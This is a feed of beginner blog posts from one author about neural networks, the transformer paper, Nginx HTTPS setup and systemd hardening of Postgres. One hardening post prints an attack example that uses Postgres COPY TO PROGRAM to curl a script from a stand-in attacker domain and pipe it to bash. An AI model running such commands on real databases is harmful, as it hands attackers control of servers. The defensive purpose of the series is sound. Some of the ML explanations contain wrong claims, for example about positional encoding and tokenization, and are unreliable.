DEV Community: Ganesh Kumar

Internal Architecture of Neural Networks

Ganesh Kumar — Fri, 08 May 2026 19:39:10 +0000

Hello, I'm Ganesh. I'm building git-lrc, an AI code reviewer that runs on every commit. It is free, unlimited, and source-available on Github. Star git-lrc on GitHub to help more developers discover the project. Do give it a try and share your feedback for improving the product.

In the previous article, we discussed neural networks and how they work.

What is a Neural Network

A neural network consists of nodes and connections between those nodes.

The connections between nodes are called parameters or weights. These values are estimated and updated during training so the model can make better predictions.

In the image above, we can see how curved lines are created to fit the data points.

Neural networks start with unknown parameter values.

The model then tries to fit the data points using those parameters and make predictions.

If the prediction is not accurate, the model updates the parameters and tries again.

This process is done using the backpropagation algorithm, which we will discuss in a later article.

Building Blocks of Neural Networks

The curved lines created to fit the data points are represented using mathematical functions.

We can reshape these functions to better fit the data points.

There are many common activation functions used in neural networks.

1. Softplus

2. ReLU

3. Sigmoid

These curved functions are called activation functions.

Basically, we choose different activation functions depending on how we want the neural network to learn and fit the data.

Conclusion

We now have a basic understanding of how neural networks work and how activation functions help fit data points.

As we continue, we will explore concepts like backpropagation, weights, biases, and training neural networks in more detail.

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub

Introduction to Neural Networks

Ganesh Kumar — Thu, 07 May 2026 19:46:13 +0000

Hello, I'm Ganesh. I'm building git-lrc, a free, micro AI code review that runs on commit. It is free, and source-available on GitHub. Star Us to help devs discover the project. Do give it a try and share your feedback for improving the product.

In this series of articles, we will explore the world of neural networks and how they work.

In this article, we will discuss the fundamental idea of neural networks.

What is a Neural Network?

A neural network is a computational model that is inspired by the structure and function of the human brain.

It is widely used in many fields like image recognition, natural language processing, etc.
It is most popular machine learning algorithm.

Simplest image of a Neural Network is :

What Neural Networks Manily Do?

It tries to approximate the function of the given input and map it to the output.

In simple terms, it tries to learn the relationship between the input and output. It approximates the output based on the input data.

This will be be done with basic mathematical functions which totaly changes based on the data we provided.

For example:

Let's take example of Drug which can cure illness.

Now let's split the gruop of people based on dosage of drug they consume.

Low dosage: Group A
Medium dosage: Group B
High dosage: Group C

Most Commonly Gruop results may be ploted as this in the graph.

To predict the efficacy of the dosage of drug we can't simply use simple straight line or normal distribution.

As for example I ploted this graph for understaning on how it is done.

This is where nerual network will help.

If we have data points in different location it will find and draw a line to predict the values between the points.

By above graph we can able to understand what neural network can do.

Conclusion

Neural Network is the best tool to fit the data points which are scattered with curve which we can use it to predict the values in between the data points.

We got to know with basic example what it actualy do.

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.
⭐ Star it on GitHub: https://github.com/HexmosTech/git-lrc

Attention Is All You Need - Part 6

Ganesh Kumar — Wed, 06 May 2026 10:56:21 +0000

Hello, I'm Ganesh. I'm building git-lrc, an AI code reviewer that runs on every commit. It is free, unlimited, and source-available on Github. Star Us to help devs discover the project. Do give it a try and share your feedback for improving the product.

In previous article we discussed about why traditional RNN model didn't work for long sentences.

In this article we will discuss about, how single attention head works?

Why Single Attention Head is not enough?

In single attention head, context of word is maintained and relates word/ token to each other.

But this also comes with a limitation of contextual understanding.

For Example:

If the sentence had multiple meanings, single attention head will focus on one.

Example:

In 5 Coach long train, in first coach the man was sleeping in 2nd coach the man was standing in 3rd coach the man was playing and in 4th coach the man was eating food.

So, for contextual understanding of man in above example needed and that is where single attention head fails.

To Solve this, multi head attention is introduced.

Multi Attention Head

Multi Attention Head works parallelly and independently. So, it captures contextual understanding of word/ token.

What next?

Finaly we got some idea on what end all happening under this.

I just want to hold upcomming exploration.

Just by getting into surface level I learned many things. But detailing i couldn't learn.

I think by 2 weeks I will explore those field and share my learning.

Reference: https://proceedings.neurips.cc/paper_files/paper/2017/file/3f5ee243547dee91fbd053c1c4a845aa-Paper.pdf

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.
⭐ Star it on GitHub: https://github.com/HexmosTech/git-lrc

Attention Is All You Need - Part 5

Ganesh Kumar — Mon, 04 May 2026 12:56:30 +0000

Hello, I'm Ganesh. I'm building git-lrc, an AI code reviewer that runs on every commit. It is free, unlimited, and source-available on GitHub. Star Us to help devs discover the project. Do give it a try and share your feedback for improving the product.

In previous article we discussed about step 2 of transformer model, i.e. position encoding.

In this article we will discuss step 3 of transformer model, i.e. Multi-Head Attention.

Why Traditional RNN model didn't work for long sentences?

Before 2017, we were using LSTM and RNN models for NLP tasks.

Basicaly as the input of words and processing and context was very less.

For Example let's assume there are 3 words model processes words 1 by 1.

So, first sentence it was taking about river bank.

The river bank.
The United Bank

Next it is about united bank which is has no related data but as we did embeding and positonal encodings we have very low probablity of understanding the context.

Here is the example of how it vector might look like.

How Single Attention Head works?

A single attention head works by determining how much focus a specific token (word) in a sequence should place on other tokens to better understand its own context.

Let's take example: "The cat sat on the mat."

For the token "sat", the attention head might learn to pay high attention to "cat" and "mat" because they are directly related to "sat".

Let's get understanding these in details in next article by actual implementing it.

Reference: https://proceedings.neurips.cc/paper_files/paper/2017/file/3f5ee243547dee91fbd053c1c4a845aa-Paper.pdf

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.
⭐ Star it on GitHub: https://github.com/HexmosTech/git-lrc

How to Configure Nginx as an HTTPS Proxy Server?

Ganesh Kumar — Sat, 02 May 2026 12:41:36 +0000

In previous article we could able to setup basic nginx server and server simple html page.

Now let's setup https for our nginx server.

Requirements

Before we start setting up https we should do the following:

Buy a domain name from any registrar.
Set up dns records to point to our server ip.
Setup Certificate for our domain name.
Install nginx on our server.
Set up nginx server to serve our website.

Buying Domain Name

We can buy domain name from any registrar like Namecheap, GoDaddy, etc.

It depends on which name it is and the charges will be around

Setting Up DNS Records

Once buy setup the dns records to point to our server ip.

Example:
For your server the ip address is [IP_ADDRESS].
And your domain name is [EMAIL_ADDRESS]

So, you need to set up a dns record to point to your server ip.

Setting up Certificate

Now let's setup certificate for our domain name.

example.com

so, we setup

sudo certbot --nginx -d `example.com` --email [EMAIL_ADDRESS] --agree-tos --no-eff-email

Here is simple workflow on how certificate is fetched and how

Key generation

The Certbot generates a private key and a CSR (Certificate Signing Request) entirely on your machine.

The private key is the core security guarantee.

HTTP-01 Challenge

Let's Encrypt needs to verify you actually control example.com. It sends Certbot a random token.

Certbot places it at:

/var/www/html/.well-known/acme-challenge/<random-token>

Nginx (already running on port 80) serves this file publicly.

Let's Encrypt fetches the token

LE makes a plain HTTP request to http://example.com/.well-known/acme-challenge/<token>.

If it gets the right response back, it's satisfied that you own the domain.

This is why DNS must be pointing to your server before you run Certbot — if the domain pointed elsewhere, LE would fetch the token from the wrong machine and the challenge would fail.

Certificate issued & saved

LE signs and returns your certificate.

Certbot saves four files to /etc/letsencrypt/live/example.com/:

File	What it is
`fullchain.pem`	Your cert + intermediate CA chain (this is what Nginx uses)
`privkey.pem`	Your private key (Nginx uses this too)
`cert.pem`	Just your cert alone
`chain.pem`	Just the CA chain alone

Nginx config is rewritten

Certbot patches your server block to add the listen 443 ssl lines and the cert paths, and adds a new server { listen 80; } block that redirects all HTTP traffic to HTTPS.

Then it reloads Nginx for you.

Setting up with nginx

Assuming your application running in local host 8090. and you are setting up https for your domain name example.com.

server {
    listen 443 ssl http2;
    server_name example.com;

    ssl_certificate     /etc/letsencrypt/live/example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;

    # All requests — public, no auth
    location / {
        proxy_pass http://localhost:8090;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto https;
    }
}

Add to symlink to sites enabled

sudo ln -s /etc/nginx/sites-available/example.com /etc/nginx/sites-enabled/

Restarting nginx

sudo nginx -t && sudo systemctl reload nginx

Conclusion

We could get https for our domain name example.com.

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.
⭐ Star it on GitHub: https://github.com/HexmosTech/git-lrc

Attention Is All You Need - Part 4

Ganesh Kumar — Fri, 01 May 2026 12:57:39 +0000

In a previous article, I explained about the embedding and preprocessing of input.

In this article we will discuss step 2 of the transformer model, i.e. position encoding.

What is Positional Encoding?

Positional encoding is a technique used to encode the position of a word in a sentence. It is used to overcome the limitation of the transformer model that it cannot process the input in parallel.

Basically whenever the input text is given to the transformer model.

say

The Lion attacked Deer.
The Deer attacked Lion.

The token generated almost like this

791, 33199, 18855, 64191, 627, 791, 64191, 18855, 33199, 13

The meaning is different but the token created same.

Which will effect vector embeddings

How Positional Encoding Will Solve?

So, basically tokens of "Lion" and "attacked" will be same in both the sentences.

This will lead to the loss of position information. To overcome this, positional encoding is used.

We use position encoding for encoding position of words. We assign a vector to each position.

To get rid of this problem we use positional encoding.

This is the formula for positional encoding:

In this next step, we will get the positional information for each word correctly without losing any information.

So, we completed step 2 of the transformer model.

Conclusion

We found out text that has different meanings has the same tokens and loses information of the position of the word in the sentence.

To overcome this, we use positional encoding.

Reference: https://proceedings.neurips.cc/paper_files/paper/2017/file/3f5ee243547dee91fbd053c1c4a845aa-Paper.pdf

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.
⭐ Star it on GitHub: https://github.com/HexmosTech/git-lrc

Attention Is All You Need - Part 3

Ganesh Kumar — Thu, 30 Apr 2026 12:49:25 +0000

In a previous article, we discussed the limitations of RNNs and how they were not able to capture long range dependencies and process input in parallel.

How are words converted to numerical value?

Each long text is encoded into a numerical value called a token.

These tokens are totally dependent on the embeddings.

For example:

"Hey, How are you?"

This will be split into tokens with 6 tokens.

Those token are 2, 6750, 235269, 2250, 708, 692

Once the word is tokenized.

Vector Embedding

These tokenized numerical values will be embedded into vectors. Or we can say a matrix of real numbers.

For example:

cat -> "Milk"
dog -> "Bone"

so, if we get distace between cat and dog as vector

We can relate to each other and get other information.
In the image, we mapped the cat and dog and then followed with related embedding vectors to the food that the cat likes.

By the same distance between dog and cat, we can find the dog's favorite food.

This process is part of input preprocessing.

Conclusion

We got to know how input is converted to vectors and then completed the first stage of the transformer model.

Reference: https://proceedings.neurips.cc/paper_files/paper/2017/file/3f5ee243547dee91fbd053c1c4a845aa-Paper.pdf

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.
⭐ Star it on GitHub: https://github.com/HexmosTech/git-lrc

Attention Is All You Need - Part 2

Ganesh Kumar — Tue, 28 Apr 2026 12:59:35 +0000

In previous article we discussed about the limitations of RNNs and how they were not able to capture long range dependencies and process input in parallel.

How was Translation done earlier?

There are many way the translation work but in earlier days it was done using seq2seq models.

For example:

Translation: "The cat sat on the mat" -> "Le chat s'est assis sur le tapis"

This translation was done using RNNs.

Let's see how this was done.

Input : Many words
Output : Many words

This had major flaws if the input seqeuence length was long the output was very poor.

so, this made the accuracy of the model very poor for long sentences.

If context is very load and it had accuracy issues then decoder might get confused and couldn't predict the correct output.

How Long sentence problem was solved?

We had to provide additional context to decoder in order to over come this issues.

That's when attention mechanism comes into picture.

This was another improvement over the seq2seq models.

We add context vector to decoder which help them to have full context vector about the input sequence.

What's next?

In this article we discussed how the translation was done earlier and how it was improved with the attention mechanism.

Reference: https://proceedings.neurips.cc/paper_files/paper/2017/file/3f5ee243547dee91fbd053c1c4a845aa-Paper.pdf

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.
⭐ Star it on GitHub: https://github.com/HexmosTech/git-lrc

Attention Is All You Need - Part 1

Ganesh Kumar — Sun, 26 Apr 2026 20:00:37 +0000

I will going to discuss about the paper "Attention Is All You Need" which introduced the Transformer architecture in 2017 and it has become one of the most important models in the field of NLP.

This paper was published in 2017 by Google researchers.

What is Background?

The Goal of Machine Learning is to learn mapping from input to output.

For example:
Predicting house price based on sqft was based on bedrooms, bathrooms, locality, etc

In email spam detection, the input is email text and the output is spam or not spam.

This were mapped through neural networks.

Neural networks is sequence of layers each transforming an input to output of previous layer.

But this had a major limitation that it was not able to capture the long range dependencies in the input.

What problem they solved?

The earlier models were based on Recurrent Neural Networks (RNNs) processed one token per time step.

Which mainly had two problems:

It was not able to capture the long range dependencies in the input.
It was not able to process the input in parallel. As it was only depended on sequential information.

How this was solved?

Transformer architecture was introduced to solve this problem.

It is based on attention mechanism.

Which allows the model to focus on the most relevant parts of the input sequence.

This is simple explaination for now I will conclude and wrap it up for this article.

Conclusion

In this article, we discussed the background of the Attention Is All You Need paper and the problem it solved.

In the next article, we will discuss the Transformer architecture in detail with an example.

Reference: https://proceedings.neurips.cc/paper_files/paper/2017/file/3f5ee243547dee91fbd053c1c4a845aa-Paper.pdf

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.
⭐ Star it on GitHub: https://github.com/HexmosTech/git-lrc

Understanding Systemd.exec—Part 3: Disabling the COPY TO PROGRAM feature in Postgres.

Ganesh Kumar — Fri, 24 Apr 2026 20:28:26 +0000

In previous article we discussed how this feature may be attacker entry point to server.

So, now let's implment custom systemd configuration to disable this feature.

Securing Postgres with systemd.exec options

I found only way for now to disable this feature is to create custom systemd configuration.

Let's identify the postgres version.

gk@jarvis:~$ psql --version
psql (PostgreSQL) 16.13 (Ubuntu 16.13-0ubuntu0.24.04.1)
gk@jarvis:~$

Based on postgress version we can use different postgresctl command.

We can add custom systemd configuration for each postgres version.

So, How attacker mostly use copy function to get inside the server?

Here, how simple funtion can be used to get inside the server.

using shell
using curl
using wget
using bash

Still goes on Many ways you can use copy function to get inside the server.

Based on my analysis and continuous retry on disable feature on by one.
I got working configureation which will disconnect from postgres access.

Available options In systemd.exec For postgres

Let's analyze these options and try to disable them using systemd.exec options.

we can use

TemporaryFileSystem
This will create read only filesystem for specific directory.
We can make sure they don't have direct access to system utilities.
BindReadOnlyPaths
Re-expose only what's needed by postgres. Example postgres binaries, libraries etc.
ProtectSystem
Block /usr, /boot, /etc from write access
ProtectHome
This will block access to /home directory.
PrivateTmp
This will create temporary /tmp and /var/tmp directories for the service.
ReadWritePaths
This is main thing as we disabled all the feature postgress data should be writable to some directory. Which can be:

/var/lib/postgresql
/var/run/postgresql
/var/log/postgresql

Just have a look based on your version.

NoNewPrivileges
If a service process tries to gain more privileges, the kernel will deny it.
This can prevent attackers from escalating privileges even if they compromise the service.
RestrictNamespaces
This option can be used to restrict the namespaces that a service can access.
This is mainly for if they try to break out from the container/VM.
RestrictAddressFamilies
This option can be used to restrict the address families that a service can access.
ProtectKernelTunables
This option can be used to prevent a service from modifying kernel tunables.
ProtectKernelModules
This option can be used to prevent a service from loading kernel modules.
ProtectControlGroups
This will prevent the service from accessing the cgroups of other processes.
ProtectProc
This will prevent the service from accessing the process information of other processes.
UMask
This will set the umask of the service.
CapabilityBoundingSet
This will set the capability bounding set of the service.
AmbientCapabilities
This will set the ambient capabilities of the service.
SystemCallFilter
This will set the system call filter of the service.
SystemCallErrorNumber
This will set the system call error number of the service.
MemoryDenyWriteExecute
This will set the memory deny write execute of the service.
LockPersonality
This will lock the personality of the service.
RestrictSUIDSGID
This will prevent the service from using SUID and SGID bits.

Configuring Systemd for postgres

So, Now let's create custom configuration for postgres.

mkdir -p /etc/systemd/system/postgresql@16-main.service.d
sudo vim /etc/systemd/system/postgresql@16-main.service.d/override.conf

Now add these options to the file.

[Service]
# ── BYPASS pg_ctlcluster (it's a perl script — breaks TemporaryFileSystem) ──
ExecStart=
ExecStart=/usr/lib/postgresql/16/bin/postgres \
  -D /var/lib/postgresql/16/main \
  -c config_file=/etc/postgresql/16/main/postgresql.conf \
  -c hba_file=/etc/postgresql/16/main/pg_hba.conf \
  -c ident_file=/etc/postgresql/16/main/pg_ident.conf \
  -c external_pid_file=/run/postgresql/16-main.pid
ExecStop=
ExecStop=/usr/lib/postgresql/16/bin/pg_ctl stop -D /var/lib/postgresql/16/main -m fast
ExecReload=
ExecReload=/usr/lib/postgresql/16/bin/pg_ctl reload -D /var/lib/postgresql/16/main

User=postgres
Group=postgres

# ── BLANK ALL EXECUTABLE DIRS ────────────────────────
TemporaryFileSystem=/usr/bin:ro
TemporaryFileSystem=/bin:ro
TemporaryFileSystem=/usr/sbin:ro
TemporaryFileSystem=/sbin:ro
TemporaryFileSystem=/usr/local/bin:ro
TemporaryFileSystem=/usr/local/sbin:ro
TemporaryFileSystem=/snap:ro
TemporaryFileSystem=/opt:ro

# ── RE-EXPOSE ONLY WHAT'S NEEDED ─────────────────────
BindReadOnlyPaths=/usr/lib/postgresql/16/bin/postgres:/usr/lib/postgresql/16/bin/postgres
BindReadOnlyPaths=/usr/lib/postgresql/16/bin/pg_ctl:/usr/lib/postgresql/16/bin/pg_ctl
BindReadOnlyPaths=/usr/lib/postgresql/16/lib:/usr/lib/postgresql/16/lib
BindReadOnlyPaths=/lib/x86_64-linux-gnu:/lib/x86_64-linux-gnu
BindReadOnlyPaths=/usr/lib/x86_64-linux-gnu:/usr/lib/x86_64-linux-gnu

# ── FILESYSTEM ───────────────────────────────────────
ProtectSystem=strict
ProtectHome=yes
PrivateTmp=yes
ReadWritePaths=/var/lib/postgresql /var/run/postgresql /var/log/postgresql

# ── BEHAVIORAL ───────────────────────────────────────
NoNewPrivileges=yes
RestrictNamespaces=yes
RestrictAddressFamilies=AF_UNIX AF_INET AF_INET6
ProtectKernelTunables=yes
ProtectKernelModules=yes
ProtectControlGroups=yes
ProtectProc=invisible
UMask=0027
CapabilityBoundingSet=
AmbientCapabilities=

# ── SYSCALL FILTER ────────────────────────────────────
SystemCallFilter=@system-service @file-system @network-io
SystemCallErrorNumber=EPERM
MemoryDenyWriteExecute=yes
LockPersonality=yes
RestrictSUIDSGID=yes

Note: There may many issues setting up this configuration. So, make sure this only done on Staging env and test it thoroughly.

sudo systemctl daemon-reload
sudo systemctl restart postgresql@16-main.service

So, If you check status

sudo systemctl status postgresql@16-main.service

You will see all the options are enabled.

If there any issues just check logs

sudo journalctl -u postgresql@16-main.service -f -n 50

Reverting Configuration

Finaly to remove this configuration just run

First we have remove the conf file.

And restart daemon and restart service.

sudo rm /etc/systemd/system/postgresql@16-main.service.d/override.conf
sudo systemctl daemon-reload
sudo systemctl restart postgresql@16-main.service

Conclusion

This is the only way I found to disable copy function in postgres. This may be experimental but still worth for adding this config if you want disable postgress copy to program function.

Reference Man Page Systemd : https://www.freedesktop.org/software/systemd/man/latest/systemd.exec.html

Discussion in HN: https://news.ycombinator.com/item?id=37164115
PostgreSQL Discussion : https://www.postgresql.org/message-id/CAKFQuwZZ0zAMpp2KjBr5bUS7RvBqouD2Kqne6YtbgZn%3DnzL1xA%40mail.gmail.com

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.
⭐ Star it on GitHub: https://github.com/HexmosTech/git-lrc

Understanding Systemd.exec - Part 2: Solving Postgres Vulnerability.

Ganesh Kumar — Thu, 23 Apr 2026 10:23:20 +0000

In previous article I explained few core features of the Systemd configuration. In this article, I will be going to demonstrate how to use these options to secure Postgres service running in systemd.

Postgres is a popular relational database management system. It is widely used in enterprise applications.

Postgres can be run in systemd and can be secured using systemd.exec options.

Why Postgres need systemd.exec options?

If any one breached the db access they not only get the data but also get access to shell access of the server.

With use of postgrace copy to function.

COPY (SELECT 1) TO PROGRAM 'curl -L https://{attacker-domain.com}/install | bash';

This way they can break through the database and get access to the server.

To remove this access there are multiple ways

creating roles based postgresql access and remove all pgexec to specific role.
Blocking port access to internet.

Still, this feature will be accessible to admin user.

Lot of discussion went on adding disable feature in pg but many also argued that this is core function as Select feature is such that it can't be removed.

Also some also says it is core function many other's use for thier company opertion.

To disable this feature in postgres, as we saw in previous article we can use systemd.exec options.

Coming Up Next

we will securing Postgrace access using systemd.exec options.

Discussion in HN: https://news.ycombinator.com/item?id=37164115
PostgreSQL Discussion : https://www.postgresql.org/message-id/CAKFQuwZZ0zAMpp2KjBr5bUS7RvBqouD2Kqne6YtbgZn%3DnzL1xA%40mail.gmail.com

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.
⭐ Star it on GitHub: https://github.com/HexmosTech/git-lrc

Understanding Systemd.exec - Part 1: How to Secure Applications Running in Systemd?

Ganesh Kumar — Tue, 21 Apr 2026 18:39:42 +0000

If you are running applications with systemd and want to restrict how they interact with Linux kernel features (like filesystem, processes, and capabilities), you can use the systemd.exec configuration options.

In this article I will be going to explain how to use these options to secure your application.

What are systemd.exec options?

Systemd.exec options are a set of configuration options that are used to configure how a systemd service interacts with the Linux kernel.

This feature is mainly used to provide security for the applications running in systemd.

Why we need this option in first place?

Hardening services (Postgres, Nginx, workers, etc) which are mostly open to the internet
Reducing blast radius after compromise
Lightweight (no container overhead)

How is this different from Docker?

Works on a single process/service.
Applies restrictions on top of the host.
Uses kernel features (namespaces, cgroups, capabilities)
Shares the same root filesystem (by default)
No packaging, no images

What is the real usecase?

Let's take an example of service.

/etc/systemd/system/myapp.service

Inside this file, we can control:

Where the app runs
Which user it runs as
What it can access
How secure / isolated it is
What resources it can use

Most common options

Run a service as non-root (security)

Set User= Group= to a non-privileged user (e.g. postgres, www-data).
This will prevent the service from running as root, which can lead to security vulnerabilities.

For example:

[Service]
User=postgres
Group=postgres

Restrict filesystem access

Set ProtectSystem= ProtectHome= ReadWritePaths= ReadOnlyPaths= to control filesystem access.
This will make service only read/ write specifed directory.

Example:

[Service]
ProtectSystem=strict
ProtectHome=yes
ReadWritePaths=/var/lib/postgresql
ReadOnlyPaths=/var/lib/postgresql/16/bin

Isolate runtime environment (like lightweight container)

Set PrivateTmp=yes NoNewPrivileges=yes to isolate runtime environment.
As there is no container like docker this will be running in the host but under private tmp and no new privileges.

Example:

[Service]
PrivateTmp=yes
NoNewPrivileges=yes

Limit resources (avoid abuse / crashes)

Set CPUQuota= MemoryMax= MemoryHigh= MemoryLimit= MemoryAccounting= to limit resources.
If we want specific service to use only limited resources, we can use these options.

Example:

[Service]
CPUQuota=50%
MemoryMax=512M

Provide controlled writable directories Set ReadWritePaths= ReadOnlyPaths= to control filesystem access. This will make service only read/ write specifed directory.

Example:

[Service]
ReadWritePaths=/var/lib/postgresql
ReadOnlyPaths=/var/lib/postgresql/16/bin

Drop dangerous privileges

Set CapabilityBoundingSet= to drop dangerous privileges.
This will make service only able to run commands with specific privileges.

Example:

[Service]
CapabilityBoundingSet=CAP_NET_BIND_SERVICE

Run temporary / ephemeral services Set RuntimeDirectory= StateDirectory= LogsDirectory= to run temporary / ephemeral services. This will run the service in a temporary / ephemeral directory.

Example:

[Service]
RuntimeDirectory=myapp
StateDirectory=myapp
LogsDirectory=myapp

Limit process / thread count Set TasksMax= to limit process / thread count. This will make service only able to run with specific process / thread count.

Example:

[Service]
TasksMax=100

Restrict access to system calls Set SystemCallFilter= SystemCallArchitectures= to restrict access to system calls. This will make service only able to use specific system calls.

Example:

[Service]
SystemCallFilter=open,read,write,close
SystemCallArchitectures=amd64

Security measures for Docker Engine Set Delegate=yes to run Docker Engine with specific privileges. This will make Docker Engine only able to run with specific privileges.

Example:

[Service]
Delegate=yes

Conclusion

We could able to use systemd.exec options to secure application running in systemd.

But Until we integrate with real application and test these options, we can't be sure about the security.

In the next article we will see how service react with integrations of these options.

Reference Man Page Systemd : https://www.freedesktop.org/software/systemd/man/latest/systemd.exec.html

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.
⭐ Star it on GitHub: https://github.com/HexmosTech/git-lrc